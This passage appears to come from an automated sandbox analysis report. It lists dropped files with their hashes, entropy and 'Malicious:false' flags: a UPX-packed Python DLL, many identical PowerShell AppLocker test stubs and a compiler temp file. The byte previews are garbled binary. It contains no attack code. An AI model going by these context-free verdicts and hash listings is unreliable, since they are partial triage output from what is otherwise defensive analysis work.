                                                                                                                                                                                                                                    SHA-256:AB072D20CEE82AE925DAE78FD41CAE7CD6257D14FD867996382A69592091D8EC
                                                                                                                                                                                                                                    SHA-512:F7758BD71D2AD236BF3220DB0AD26F3866D9977EAB311A5912F6E079B59FA918735C852DE6DBF7B5FEE9E04124BC0CD438C4C71EDC0C04309330108BA0085D59
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......CG;..&U..&U..&U..^..&U.HZT..&U.HZP..&U.HZQ..&U.HZV..&U..TT..&U..&T..&U..Z]..&U..ZU..&U..Z...&U..ZW..&U.Rich.&U.................PE..d...X..c.........." ...".0...0............................................................`.............................................d"..................................x...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc....0...........,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI72642\unicodedata.pyd

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\cmd.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):294784
                                                                                                                                                                                                                                    Entropy (8bit):7.987175768019268
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:PudZUEjoXwDrGv4qJBd4R0u3FIp6O4LMHS+OsfW/+vzoFZ:EGEjyirGd+f3FIp7eMHS+CUUr
                                                                                                                                                                                                                                    MD5:7A462A10AA1495CEF8BFCA406FB3637E
                                                                                                                                                                                                                                    SHA1:6DCBD46198B89EF3007C76DEB42AB10BA4C4CF40
                                                                                                                                                                                                                                    SHA-256:459BCA991FCB88082D49D22CC6EBFFE37381A5BD3EFCC77C5A52F7A4BB3184C0
                                                                                                                                                                                                                                    SHA-512:D2B7C6997B4BD390257880A6F3336E88D1DD7159049811F8D7C54E3623E9B033E18E8922422869C81DE72FC8C10890C173D8A958D192DD03BFC57CFFAEA1AC7B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t..t..t..}...r..;...v..;...y..;...|..;...w.....w......v..t..%.....u.....u...y.u.....u..Richt..........PE..d...(..c.........." ...".P..........@V... ................................................`..........................................{..X....y.......p..........<............{......................................@b..@...........................................UPX0....................................UPX1.....P... ...D..................@....rsrc........p.......H..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00lnsnrw.104.psm1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_03gmiwaj.5cd.ps1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_35q3qhre.ezq.ps1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xq1ea1w.u4r.ps1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3zycxuos.yem.psm1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5emimdkq.c3i.psm1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnvikn35.ec1.ps1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3movln3.it1.psm1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hry1hnuh.zfx.ps1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kuxnukag.a0a.psm1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mujgvvjl.q2h.ps1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzfxak4x.mw3.psm1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n21kmoya.db2.ps1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5svi5rr.o0h.psm1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_soq1sj2s.4go.psm1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uivz5zqo.gbh.psm1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxugwe03.hyz.ps1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vq4lqnd1.aiy.ps1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wkkjtubl.kzz.psm1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkomwbn5.ljd.ps1

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bcdu5fii\CSC91B7380AF2C2414A909984B12C6688DE.TMP

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):652
                                                                                                                                                                                                                                    Entropy (8bit):3.093490431917851
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry6G5ak7YnqqfGOPN5Dlq5J:+RI+ycuZhNc+akSffPNnqX
                                                                                                                                                                                                                                    MD5:FA4EA160D5CB4B9E7C12F49128BFB617
                                                                                                                                                                                                                                    SHA1:DA3A8EE291D4D435B78F83A1ABCE4C1724595846
                                                                                                                                                                                                                                    SHA-256:40B753643CF8574332B04D35650BD279AB03528BD41D63B86F8736C2E083A562
